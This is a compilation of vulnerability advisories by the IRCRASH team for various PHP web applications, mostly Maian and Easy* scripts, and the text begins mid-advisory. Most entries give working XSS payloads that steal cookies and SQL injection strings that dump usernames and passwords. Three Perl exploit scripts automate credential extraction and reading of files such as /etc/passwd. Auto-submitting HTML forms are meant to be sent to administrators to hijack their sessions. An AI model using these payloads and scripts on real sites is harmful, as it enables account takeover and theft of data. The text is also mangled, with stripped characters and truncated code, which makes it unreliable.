XSS Vulnerability 12 : /data/inc/header2.php = http://Example.com/data/inc/header2.php?pluck_version=[Cross Site Scripting] XSS Vulnerability 13 : /data/inc/header2.php = http://Example.com/data/inc/header2.php?titelkop=[Cross Site Scripting] XSS Vulnerability 14 : /data/inc/header2.php = http://Example.com/data/inc/header2.php?titelkop=[Cross Site Scripting] XSS Vulnerability 15 : /data/inc/themeinstall.php = http://Example.com/data/inc/themeinstall.php?lang_theme6=[Cross Site Scripting] Solution : Filter all insecure variable with htmlspecialchars() function Tnx : God HTTP://IRCRASH.COM HTTP://FEREIDANI.IR
Xampp Linux 1.6.7 Multiple Cross Site Scripting Vulnerabilities
Program : Xampp Linux 1.6.7 Type : Multiple Cross Site Scripting Vulnerabilities Alert : Medium Download From : http://puzzle.dl.sourceforge.net/sourceforge/xampp/xampp-linux-1.6.7.tar.gz Discovered by : Khashayar Fereidani Or Dr.Crash My Website : HTTP://FEREIDANI.IR Team Website : Http://IRCRASH.COM Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com Cross Site Scripting Vulnerabilities : Vulnerability work when register_globals set as on . http://Example.com/xampp/iart.php?text=;''scriptalert(document.alert)/script http://Example.com/xampp/ming.php?text=;''scriptalert(document.alert)/script Solution : Remove xampp folder or filter text variable with htmlspecialchars() function Tnx : God HTTP://IRCRASH.COM
MJGuest 6.8 GT Cross Site Scripting Vulnerability
Script : MJGuest 6.8 GT
Type : Cross Site Scripting Vulnerability
Alert : Medium
Discovered by : Khashayar Fereidani
Our Team : IRCRASH
My Official Website : HTTP://FEREIDANI.IR
Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR
Script Download : http://www.mdsjack.bo.it/files/mjguest_6.8gt.zip
XSS Vulnerability :
Invalid Code : ./guestbook.js.php = document.write('a
href=javascript:guestbook()' + '?php echo $_GET['link']?' + '/a');
Vulnerable variable : link
Address : http://Example/guestbook.js.php?link=[XSS]
Solution : Filter link variable with htmlsepcialchars() function .
Tnx : God
HTTP://IRCRASH.COM
DEV WMS Multiple Vulnerabilities
Script : DEV WMS
Type : Multiple Vulnerabilities ( Local file inclusion / Cross Site Scripting /
SQL Injection )
Alert : High
Discovered by : Khashayar Fereidani Or Dr.Crash
My Website : HTTP://FEREIDANI.IR
Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com
Script Download : http://dev-wms.sourceforge.net/
XSS Vulnerability 1 :
Variable Sent Method : GET
Vulnerable Variable : session
Address :
http://Example.com/?session=;scriptalert(document.cookie)/script
Solution : filter session variable with htmlspecialchars() function ...
Xss Vulnerability 2 :
Variable Sent Method : POST
Vulnerable Variable : kluc
Address : http://Example.com/index.php?session=0action=search
change example.com to script address in a real site and save as ircrash.html ,
open file with browser and see your cookie .
html
head/head
body onLoad=javascript:document.form.submit()
form action=http://Example.com/index.php?session=0action=search;
method=POST name=form
form method=post onSubmit=return validateprm(this)input type=hidden
name=prip value=true/input type=hidden name=action value=search/
input type=hidden name=kluc
value=#34#39#39#39#60#62#62#62#62scriptalert('xss')/script
/form
/body
/html
Solution : filter kluc variable with htmlspecialchars() function ...
SQL Injection :
Method Of Send : GET
Vulnerable Variable : article
Address :
http://Example.com/index.php?session=0action=readclick=openarticle=[SQL CODE]
Solution : Filter danger caracter for article variable ...
Local file inclusion :
Method Of Send : GET
Vulnerable Variable : step
Address : http://Example.com/admin/index.php?start=installstep=file.type%00
Solution : Filter step variable with if function ...
Tnx : God
HTTP://IRCRASH.COM
Easybookmarker 40tr Xss Vulnerability By Khashayar Fereidani
Script : Easybookmarker 40tr
Type : Xss Vulnerability
Method : POST
Alert : High
Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
My Offical Website : HTTP://FEREIDANI.IR
Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR
Script Download :
http://myiosoft.com/download/EasyBookMarker/easybookmarker-40tr.zip
Xss Vulnerability :
Variable : rs
Send Method : POST
Set rs variable with post method in ajaxp_backend.php :
scriptalert('xss')/script for test vulnerability
html
head/head
body onLoad=javascript:document.form.submit()
form action=http://example/zomplog/ajaxp_backend.php;
method=POST name=form
input type=hidden name=rs value=#x22;#x20;
scriptalert(document.cookie)/script
/form
/body
/html
Tnx : God
HTTP://IRCRASH.COM
EasyPublish 3.0tr Multiple Vulnerabilities ( Xss / Sql Injection Exploit / File Disclosure Exploit )
#!/usr/bin/perl
#
#
#Script : EasyPublish 3.0tr
#
#Type : Multiple Vulnerabilities ( Xss / Sql Injection Exploit / File
Disclosure Exploit )
#
#Variable Method : GET
#
#Alert : High
#
#
#
#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
#
#My Official Website : HTTP://FEREIDANI.IR
#
#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
#
#
#
#Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR
#
#
#
#Script Download : http://myiosoft.com/download/EasyPublish/easypublish-30tr.zip
#
#
#
#Xss 1 :
http://Example//staticpages/easypublish/index.php?PageSection=0page=individualtable=edp_Newsread=%scriptalert(document.cookie);/script
#
#
#
#SQL Injection :
#
#SQL 1 :
http://Example/staticpages/easypublish/index.php?PageSection=0table=edp_Newspage=individualfage=searchread=1+union+all+select+1,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),3,4,1,5+FROM+edp_puusers/*;--
#
#
#
#
#Tnx : God
#
# HTTP://IRCRASH.COM
#
#
use LWP;
use HTTP::Request;
use Getopt::Long;
sub header
{
print
* EasyPublish 3.0tr Exploit *
*Discovered by : Khashayar Fereidani *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir *
;
}
sub usage
{
print
* Usage : perl $0 http://Example/
;
}
$url = ($ARGV[0]);
if(!$url)
{
header();
usage();
exit;
}
if($url !~ /\//){$url = $url./;}
if($url !~ /http:\/\//){$url = http://.$url;}
sub xpl1()
{
$vul =
/staticpages/easypublish/index.php?PageSection=0table=edp_Newspage=individualfage=searchread=1+union+all+select+1,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),3,4,1,5+FROM+edp_puusers/*;
$requestpage = $url.$vul;
my $req = HTTP::Request-new(POST,$requestpage);
$ua = LWP::UserAgent-new;
$ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req-referer($url);
$req-referer(IRCRASH.COM);
$req-content_type('application/x-www-form-urlencoded');
$req-header(content-length = $contlen);
$req-content($poststring);
$response = $ua-request($req);
$content = $response-content;
$header = $response-headers_as_string();
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/enduser/,$name);
$name = @name[0];
@password = split(/Password:/,$content);
$password = @password[1];
@password = split(/endpass/,$password);
$password = @password[0];
if(!$name !$password)
{
print \n\n;
print !Exploit failed ! :(\n\n;
exit;
}
print \n Username: .$name.\n\n;
print Password: .$password.\n\n;
}
#XPL2
sub xpl2()
{
print \n Example For File Address : /home/user/public_html/config.php\n Or
/etc/passwd;
print \n Enter File Address :;
$fil3 = stdin;
$vul =
/staticpages/easypublish/index.php?PageSection=0table=edp_Newspage=individualfage=searchread=1+union+all+select+1,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),3,4,1,5+FROM+edp_puusers/*;
$requestpage = $url.$vul;
my $req = HTTP::Request-new(POST,$requestpage);
$ua = LWP::UserAgent-new;
$ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req-referer($url);
$req-referer(IRCRASH.COM);
$req-content_type('application/x-www-form-urlencoded');
$req-header(content-length = $contlen);
$req-content($poststring);
$response = $ua-request($req);
$content = $response-content;
$header = $response-headers_as_string();
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/enduser/,$name);
$name = @name[0];
if(!$name !$password)
{
print \n\n;
print !Exploit failed ! :(\n\n;
exit;
}
open (FILE, .source..txt);
print FILE $name;
close (FILE);
print File Save In source.txt\n;
print ;
}
#XPL2 END
#Starting;
print
* EasyPublish 3.0tr Exploit *
*Discovered by : Khashayar Fereidani *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir *
* Mod Options
Easyecards 310a Multipe Vulerabilities ( Xss / Sql Injection Exploit / File Disclosure Exploit ) By Khashayar Fereidani
#!/usr/bin/perl
#
#
#Script : Easyecards 310a
#
#Type : Multipe Vulerabilities ( Xss / Sql Injection Exploit / File Disclosure
Exploit )
#
#Variable Method : GET
#
#Alert : High
#
#
#
#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
#
#My Offical Website : HTTP://FEREIDANI.IR
#
#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
#
#
#
#Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR
#
#
#
#Script Download : http://myiosoft.com/download/EasyE-Cards/easyecards-310a.zip
#
#
#Xss 1 : http://Example/?ResultHtml=scriptalert('xss')/script
#
#Xss 2 :
http://Example/index.php?step=2dir=''scriptalert('xss')/script
#
#Xss 3 :
http://Example/index.php?step=2SenderName=''scriptalert('xss')/script
#
#Xss 4 :
http://Example/index.php?step=2RecipientName=%3C%3E%3E%3E%3E%27%27%22%3Cscript%3Ealert(%27xss%27)%3C/script%3E
#
#Xss 5 :
http://Example/index.php?step=2SenderMail=''scriptalert('xss')/script
#
#Xss 6 :
http://Example/index.php?step=2RecipientMail=%3C%3E%3E%3E%3E%27%27%22%3Cscript%3Ealert(%27xss%27)%3C/script%3E
#
#
#
#SQL Injection :
#
#SQL 1 :
http://Example/index.php?show=pickupsid=9'+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13/*
#
#
#
#
#Tnx : God
#
# HTTP://IRCRASH.COM
#
#
use LWP;
use HTTP::Request;
use Getopt::Long;
sub header
{
print
*Easyecards 310a Exploit *
*Discovered by : Khashayar Fereidani *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir *
;
}
sub usage
{
print
* Usage : perl $0 http://Example/
;
}
$url = ($ARGV[0]);
if(!$url)
{
header();
usage();
exit;
}
if($url !~ /\//){$url = $url./;}
if($url !~ /http:\/\//){$url = http://.$url;}
sub xpl1()
{
$vul =
?show=pickupsid=9'+union+select+0,concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),2,3,4,5,6,7,8,9,10,11,12,13+from+mysql.user/*;
$requestpage = $url.$vul;
my $req = HTTP::Request-new(POST,$requestpage);
$ua = LWP::UserAgent-new;
$ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req-referer($url);
$req-referer(IRCRASH.COM);
$req-content_type('application/x-www-form-urlencoded');
$req-header(content-length = $contlen);
$req-content($poststring);
$response = $ua-request($req);
$content = $response-content;
$header = $response-headers_as_string();
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/enduser/,$name);
$name = @name[0];
@password = split(/Password:/,$content);
$password = @password[1];
@password = split(/endpass/,$password);
$password = @password[0];
if(!$name !$password)
{
print \n\n;
print !Exploit failed ! :(\n\n;
exit;
}
print \n Username: .$name.\n\n;
print Password: .$password.\n\n;
}
#XPL2
sub xpl2()
{
print \n Example For File Address : /home/user/public_html/config.php\n Or
/etc/passwd;
print \n Enter File Address :;
$fil3 = stdin;
$vul =
?show=pickupsid=9'+union+select+0,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),2,3,4,5,6,7,8,9,10,11,12,13+from+mysql.user/*;
$requestpage = $url.$vul;
my $req = HTTP::Request-new(POST,$requestpage);
$ua = LWP::UserAgent-new;
$ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req-referer($url);
$req-referer(IRCRASH.COM);
$req-content_type('application/x-www-form-urlencoded');
$req-header(content-length = $contlen);
$req-content($poststring);
$response = $ua-request($req);
$content = $response-content;
$header = $response-headers_as_string();
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/enduser/,$name);
$name = @name[0];
if(!$name !$password)
{
print \n\n;
print !Exploit failed ! :(\n\n;
exit;
}
open (FILE, .source..txt);
print FILE $name;
close (FILE);
print File Save In source.txt\n;
print ;
}
#XPL2 END
#Starting;
print
*Easyecards 310a Exploit *
*Discovered by : Khashayar Fereidani *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir
Maran PHP Blog Xss By Khashayar Fereidani
Script : Maran PHP Blog Type : XSS (Pasive) Method : GET Alert : Medium Discovered by : Khashayar Fereidani a.k.a. Dr.Crash My Offical Website : HTTP://FEREIDANI.IR Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR Script Download : http://www.maran.pamil-visions.com/download2.php?dir=maranphpfile=maranblog.zip This Is One Xss Vulnerability in ID Variable . Attacker Can Execute JavaScript Code And Get Admin Cookie And Send new article with admin cookie . Xss Address : http://Example/comments.php?id=%3E%3C%3E%27%3Cscript%3Ealert(document.cookie)%3C/script%3E Solution : Edit Source Code And Filter id Variable With htmlspecialchars() function in comments.php ... line 32 : input type='hidden' name='id' value='?echo $_GET['id'];?'br Change It To : input type='hidden' name='id' value='?echo htmlspecialchars($_GET['id']);?'br Tnx : God HTTP://IRCRASH.COM
Easydynamicpages 30tr Multipe Vulerabilities ( Xss / Sql Injection Exploit / File Disclosure Exploit )
#!/usr/bin/perl
#
#
#Script : Easydynamicpages 30tr
#
#Type : Multipe Vulerabilities ( Xss / Sql Injection Exploit / File Disclosure
Exploit )
#
#Variable Method : GET
#
#Alert : High
#
#
#
#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
#
#My Offical Website : HTTP://FEREIDANI.IR
#
#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
#
#
#
#Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR
#
#
#
#Script Download :
http://myiosoft.com/download/EasyDynamicPages/easydynamicpages-30tr.zip
#
#
#
#Xss 1 :
http://Example/staticpages/easycalendar/index.php?PageSection=1month=4year=scriptalert(document.cookie);/script
#
#
#
#SQL Injection :
#
#SQL 1 :
http://Example/dynamicpages/index.php?page=individualtable=edp_Help_Internal_Newsread=1+union/**/select/**/0,1,2,3,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),5,6/**/from/**/edp_puusers/*
#
#
#
#
#Tnx : God
#
# HTTP://IRCRASH.COM
#
#
use LWP;
use HTTP::Request;
use Getopt::Long;
sub header
{
print
* Easydynamicpages 30tr Exploit*
*Discovered by : Khashayar Fereidani *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir *
;
}
sub usage
{
print
* Usage : perl $0 http://Example/
;
}
$url = ($ARGV[0]);
if(!$url)
{
header();
usage();
exit;
}
if($url !~ /\//){$url = $url./;}
if($url !~ /http:\/\//){$url = http://.$url;}
sub xpl1()
{
$vul =
/dynamicpages/index.php?page=individualtable=edp_Help_Internal_Newsread=1+union/**/select/**/0,1,2,3,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),5,6/**/from/**/edp_puusers/*;
$requestpage = $url.$vul;
my $req = HTTP::Request-new(POST,$requestpage);
$ua = LWP::UserAgent-new;
$ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req-referer($url);
$req-referer(IRCRASH.COM);
$req-content_type('application/x-www-form-urlencoded');
$req-header(content-length = $contlen);
$req-content($poststring);
$response = $ua-request($req);
$content = $response-content;
$header = $response-headers_as_string();
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/enduser/,$name);
$name = @name[0];
@password = split(/Password:/,$content);
$password = @password[1];
@password = split(/endpass/,$password);
$password = @password[0];
if(!$name !$password)
{
print \n\n;
print !Exploit failed ! :(\n\n;
exit;
}
print \n Username: .$name.\n\n;
print Password: .$password.\n\n;
}
#XPL2
sub xpl2()
{
print \n Example For File Address : /home/user/public_html/config.php\n Or
/etc/passwd;
print \n Enter File Address :;
$fil3 = stdin;
$vul =
/dynamicpages/index.php?page=individualtable=edp_Help_Internal_Newsread=1+union/**/select/**/0,1,2,3,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),5,6/**/from/**/edp_puusers/*;
$requestpage = $url.$vul;
my $req = HTTP::Request-new(POST,$requestpage);
$ua = LWP::UserAgent-new;
$ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req-referer($url);
$req-referer(IRCRASH.COM);
$req-content_type('application/x-www-form-urlencoded');
$req-header(content-length = $contlen);
$req-content($poststring);
$response = $ua-request($req);
$content = $response-content;
$header = $response-headers_as_string();
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/enduser/,$name);
$name = @name[0];
if(!$name !$password)
{
print \n\n;
print !Exploit failed ! :(\n\n;
exit;
}
open (FILE, .source..txt);
print FILE $name;
close (FILE);
print File Save In source.txt\n;
print ;
}
#XPL2 END
#Starting;
print
* Easydynamicpages 30tr Exploit*
*Discovered by : Khashayar Fereidani *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir *
* Mod Options :*
* Mod 1 : Find mysql username
VistaReseller Panel BETA Xss Vulnerability
##
# VistaReseller Panel BETA Xss Vulnerability
##
# Discovered By Khashayar Fereidani Or Ircrash
# Our Team : IRCRASH
# IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi -
Malc0de - R3d.w0rm - Rasool Nasr
# Risk : Low
##
# Xss Address : http://Example/panel/index.php?option=forums
# Variable : [resellerdomain]
##
# How Work With it :
# Login In VistaReseller Panel And Open Url
# Insert http://;scriptalert('xss')/script in Text box and click (Add)
Button .
# Now Open the Url Again See xss msg
##
# Solution : Edit Source Code And Filter Variable With htmlspecialchar()
function ...
##
# Khashayar Fereidani Email : irancrash[at]gmail[at]com
# Tnx : God
##
Maian Uploader v4.0 XSS Vulnerabilities
Script : Maian Uploader v4.0
Type : XSS Vulnerabilities
Discovered by : Khashayar Fereidani Or Dr.Crash
Our Team : IRCRASH
Our Site : Http://IRCRASH.COM
IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM
IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi -
Malc0de - R3d.w0rm - Rasool Nasr
Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html
XSS 1 :
http://localhost/maian/upload/admin/index.php?cmd=searchprocess=1keywords=;scriptalert('xss')/script
XSS 2 :
http://Example/admin/inc/header.php?msg_charset=;scriptalert('xss')/script
XSS 3 :
http://Example/admin/inc/header.php?msg_header9=;scriptalert('xss')/script
XSS 4 :
http://Example/admin/inc/header.php?msg_header9=;scriptalert('xss')/script
XSS 4 :
http://Example/index.php?cmd=searchkeywords=;scriptalert('xss')/script
You Can Get Admin Session With This Vuln
Solution : Edit Source Code And Filter Variable With htmlspecialchar() function
...
TNx : God..
Khashayar Fereidani Email : irancrash[at]gmail[dot]com
LifeType 1.2.8
Script : LifeType 1.2.8 Type : XSS Vulnerability Discovered by : Khashayar Fereidani Or Dr.Crash Our Team : IRCRASH Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr Script Download : http://mesh.dl.sourceforge.net/sourceforge/lifetype/lifetype-1.2.8.tar.bz2 Type : Cross Site Scripting Method Of Send : POST File Name : http://Example/admin.php?op=editArticleCategories Vulnerable Variable : newBlogUserName Set Add this user Variable : Add Set op Variable : addBlogUser You Can Get Admin Cookie With This Vuln Exploit : Upload This Page And Send Link For Administrator . html head/head #Vulnerabily discovered by Khashayar Fereidani Or Dr.Crash body onLoad=javascript:document.form.submit() form action=http://Example/lifetype/admin.php?op=editArticleCategories; method=POST name=form input type=hidden name=newBlogUserName value=#x22;#x20;[XSS CODE] input type=hidden name=Add this user value=Add input type=hidden name=op value=addBlogUser /form /body /html Solution : Edit Source Code And Filter newBlogUserName Variable With htmlspecialchar() function ... TNx : God.. Khashayar Fereidani Email : irancrash[at]gmail[dot]com IRCRASH TEAM - Http://IRCRASH.COM/
Maian Gallery v2.0 XSS Vulnerability
Script : Maian Gallery v2.0 Type : XSS Vulnerability Discovered by : Khashayar Fereidani Or Dr.Crash Our Team : IRCRASH Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html Xss 1 : http://Example/admin/index.php?cmd=searchsearch=1keywords=;scriptalert(document.cookie)/script Solution : Edit Source Code And Filter Variable via htmlspecialchar() function ... TNx : God.. Khashayar Fereidani Email : irancrash[at]gmail[dot]com
Maian Cart v1.1 XSS Vulnerabilities
Script : Maian Cart v1.1 Type : XSS Vulnerabilities Discovered by : Khashayar Fereidani Or Dr.Crash Our Team : IRCRASH Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html XSS 1 : http://Example/admin/inc/header.php?msg_adminheader=scriptalert(document.cookie)/script XSS 2 : http://Example/admin/inc/header.php?msg_adminheader2=scriptalert(document.cookie)/script XSS 3 : http://Example/admin/inc/header.php?msg_adminheader3=scriptalert(document.cookie)/script XSS 4 : http://Example/admin/inc/header.php?msg_adminheader4=scriptalert(document.cookie)/script Many Variable have Xss Vuln In header.php Xss 5 : http://Example/admin/inc/footer.php?msg_script3=scriptalert(document.cookie)/script Many Variable have Xss Vuln In footer.php Xss 6 : http://Example/maian/cart/index.php?cmd=searchkeywords=scriptalert(document.cookie)/scriptx=0y=0 Solution : Edit Source Code And Filter Variable With htmlspecialchar() function ... TNx : God.. Khashayar Fereidani Email : irancrash[at]gmail[dot]com
Maian Search v1.1 Multiple Vulnerabilities (XSS/SQL INJECTION)
Script : Maian Search v1.1
Type : Multiple Vulnerabilities (XSS/SQL INJECTION)
Discovered by : Khashayar Fereidani Or Dr.Crash
Our Team : IRCRASH
Our Site : Http://IRCRASH.COM
IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM
IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi -
Malc0de - R3d.w0rm - Rasool Nasr
Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html
SQL INJECTION : http://Example/search.php?cmd=searchkeywords=[SQL INJECTION]
XSS 1 :
http://Example/admin/inc/header.php?header=/titlescriptalert('xss')/script
XSS 2 :
http://Example/admin/inc/header.php?header2=;scriptalert('xss')/script
XSS 3 :
http://Example/admin/inc/header.php?header3=;scriptalert('xss')/script
XSS 4 :
http://Example/admin/inc/header.php?header4=;scriptalert('xss')/script
XSS 5 :
http://Example/admin/inc/header.php?header5=;scriptalert('xss')/script
XSS 6 :
http://Example/admin/inc/header.php?header6=;scriptalert('xss')/script
XSS 7 :
http://Example/admin/inc/header.php?header7=;scriptalert('xss')/script
XSS 8 :
http://Example/admin/inc/header.php?header8=;scriptalert('xss')/script
XSS 9 :
http://Example/admin/inc/header.php?header9=;scriptalert('xss')/script
You Can Get Admin Session With This Vuln
Solution : Edit Source Code And Filter Variable With htmlspecialchar() function
...
TNx : God..
Khashayar Fereidani Email : irancrash[at]gmail[dot]com
Maian Guestbook v3.2 XSS Vulnerabilities
Script : Maian Guestbook v3.2 Type : XSS Vulnerabilities Discovered by : Khashayar Fereidani Or Dr.Crash Our Team : IRCRASH Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html XSS 1 : http://Example/admin/inc/footer.php?msg_script2=scriptalert(document.cookie)/script XSS 2 : http://Example/admin/inc/footer.php?msg_script3=scriptalert(document.cookie)/script Solution : Edit Source Code And Filter Variable With htmlspecialchar() function ... TNx : God.. Khashayar Fereidani Email : irancrash[at]gmail[dot]com
Maian Weblog v4.0 XSS Vulnerabilities
Script : Maian Weblog v4.0
Type : XSS Vulnerabilities
Discovered by : Khashayar Fereidani Or Dr.Crash
Our Team : IRCRASH
Our Site : Http://IRCRASH.COM
IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM
IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi -
Malc0de - R3d.w0rm - Rasool Nasr
Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html
XSS 1 :
http://Example/admin/index.php?cmd=searchsearch=1area=blogskeywords=;scriptalert('xss')/script
XSS 2 :
http://Example/admin/inc/header.php?msg_charset=;scriptalert('xss')/script
XSS 3 :
http://Example/admin/inc/header.php?msg_header9=;scriptalert('xss')/script
XSS 4 :
http://Example/admin/inc/header.php?msg_header9=;scriptalert('xss')/script
XSS 4 :
http://Example/index.php?cmd=searchkeywords=;scriptalert('xss')/script
You Can Get Admin Session With This Vuln
Solution : Edit Source Code And Filter Variable With htmlspecialchar() function
...
TNx : God..
Khashayar Fereidani Email : irancrash[at]gmail[dot]com
Maian Greeting v2.1 Multiple Vulnerabilities (XSS/SQL INJECTION)
Script : Maian Greeting v2.1
Type : Multiple Vulnerabilities (XSS/SQL INJECTION)
Discovered by : Khashayar Fereidani Or Dr.Crash
Our Team : IRCRASH
Our Site : Http://IRCRASH.COM
IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM
IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi -
Malc0de - R3d.w0rm - Rasool Nasr
Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html
SQL INJECTION : http://Example/index.php?cmd=searchkeywords=[SQL
INJECTION]cat=all
XSS 1 :
http://Example/admin/inc/header.php?msg_script=;scriptalert('xss')/script
XSS 2 :
http://Example/admin/inc/header.php?msg_script2=;scriptalert('xss')/script
You Can Get Admin Session With This Vuln
Solution : Edit Source Code And Filter Variable With htmlspecialchar() function
...
TNx : God..
Khashayar Fereidani Email : irancrash[at]gmail[dot]com
Maian Support v1.3 Xss Vulnerabilities
Script : Maian Support v1.3
Type : Xss Vulnerabilities
Discovered by : Khashayar Fereidani Or Dr.Crash
Our Team : IRCRASH
Our Site : Http://IRCRASH.COM
IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM
IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi -
Malc0de - R3d.w0rm - Rasool Nasr
Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html
XSS 1 :
http://Example/admin/inc/footer.php?msg_script=;scriptalert('xss')/script
XSS 2 :
http://Example/admin/inc/footer.php?msg_script2=;scriptalert('xss')/script
XSS 3 :
http://Example/admin/inc/footer.php?msg_script3=;scriptalert('xss')/script
XSS 3 :
http://Example/admin/inc/header.php?msg_script2=;scriptalert('xss')/script
You Can Get Admin Session With This Vuln
Solution : Edit Source Code And Filter Variable With htmlspecialchar() function
...
TNx : God..
Khashayar Fereidani Email : irancrash[at]gmail[dot]com
Maian Recipe v1.2 Xss Vulnerabilities
Script : Maian Recipe v1.2
Type : Xss Vulnerabilities
Discovered by : Khashayar Fereidani Or Dr.Crash
Our Team : IRCRASH
Our Site : Http://IRCRASH.COM
IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM
IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi -
Malc0de - R3d.w0rm - Rasool Nasr
Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html
XSS 1 :
http://Example/admin/inc/header.php?header=/titlescriptalert('xss')/script
XSS 2 :
http://Example/admin/inc/header.php?header2=;scriptalert('xss')/script
XSS 3 :
http://Example/admin/inc/header.php?header3=;scriptalert('xss')/script
XSS 4 :
http://Example/admin/inc/header.php?header4=;scriptalert('xss')/script
XSS 5 :
http://Example/admin/inc/header.php?header5=;scriptalert('xss')/script
XSS 6 :
http://Example/admin/inc/header.php?header6=;scriptalert('xss')/script
XSS 7 :
http://Example/admin/inc/header.php?header7=;scriptalert('xss')/script
XSS 8 :
http://Example/admin/inc/header.php?header8=;scriptalert('xss')/script
XSS 9 :
http://Example/admin/inc/header.php?header9=;scriptalert('xss')/script
You Can Get Admin Session With This Vuln
Solution : Edit Source Code And Filter Variable With htmlspecialchar() function
...
TNx : God..
Khashayar Fereidani Email : irancrash[at]gmail[dot]com
Maian Music v1.1 Multiple Vulnerabilities (Xss/SQL Injection)
